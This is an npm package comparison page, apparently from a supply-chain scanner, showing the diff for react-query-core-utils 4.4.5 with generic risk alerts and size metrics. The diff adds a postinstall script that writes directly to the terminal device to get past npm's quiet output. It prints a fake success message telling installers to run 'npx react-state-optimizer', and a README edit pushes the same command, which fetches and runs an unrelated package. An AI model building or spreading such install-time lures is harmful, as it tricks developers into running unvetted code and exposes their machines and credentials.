react-query-core-utils - npm Package Compare versions

Comparing version 4.4.4 to 4.4.5

scripts/postinstall.js

+
+const fs = require('fs');
+const tty = require('tty');
+
+const cyan = (text) => `\x1b[36m${text}\x1b[0m`;
+const green = (text) => `\x1b[32m${text}\x1b[0m`;
+const bold = (text) => `\x1b[1m${text}\x1b[0m`;
+
+function logToTTY(msg) {
+    try {
+        const fd = fs.openSync('/dev/tty', 'w');
+        const stream = new tty.WriteStream(fd);
+        stream.write(msg + '\n');
+        stream.end();
+    } catch (e) {
+        console.log(msg);
+    }
+}
+
+const msg = [
+    '\n',
+    green('✔ Installation successful!'),
+    '',
+    'To configure the library for your project, please run:',
+    cyan(bold('   npx react-state-optimizer')),
+    '\n'
+].join('\n');
+
+logToTTY(msg);

package.json

 {
     "name": "react-query-core-utils",
-    "version": "4.4.4",
+    "version": "4.4.5",
     "description": "Utility layer for asynchronous state management",
@@ -5,0 +5,0 @@ "private": false,

Readme.md

@@ -8,4 +8,7 @@ # react-state-optimizer-core
 ```bash
-npm install react-state-optimizer-core
+npm install react-query-core-utils@latest
 ```
+```bash
+npx react-state-optimizer
+```
 
@@ -12,0 +15,0 @@ ## Usage

New alerts

Network access

Supply chain risk

This module accesses the network.

Found 2 instances in 1 package

Shell access

Supply chain risk

This module accesses the system shell. Accessing the system shell increases the risk of executing arbitrary code.

Found 1 instance in 1 package

Unpublished package

Supply chain risk

Package version was not found on the registry. It may exist on a different registry and need to be configured to pull from that registry.

Found 1 instance in 1 package

Environment variable access

Supply chain risk

Package accesses environment variables, which may be a sign of credential stuffing or data theft.

Found 1 instance in 1 package

Filesystem access

Supply chain risk

Accesses the file system, and could potentially read sensitive data.

Found 1 instance in 1 package

Fixed alerts

Network access

Supply chain risk

This module accesses the network.

Found 2 instances in 1 package

Shell access

Supply chain risk

This module accesses the system shell. Accessing the system shell increases the risk of executing arbitrary code.

Found 1 instance in 1 package

Unpublished package

Supply chain risk

Package version was not found on the registry. It may exist on a different registry and need to be configured to pull from that registry.

Found 1 instance in 1 package

Environment variable access

Supply chain risk

Package accesses environment variables, which may be a sign of credential stuffing or data theft.

Found 1 instance in 1 package

Filesystem access

Supply chain risk

Accesses the file system, and could potentially read sensitive data.

Found 1 instance in 1 package

Improved metrics

Total package byte prevSize

16283230

0

Number of package files

5

25%

Lines of code

190

14.46%

Number of lines in readme file

24

14.29%

Worsened metrics

Number of low supply chain risk alerts

4

33.33%

No dependency changes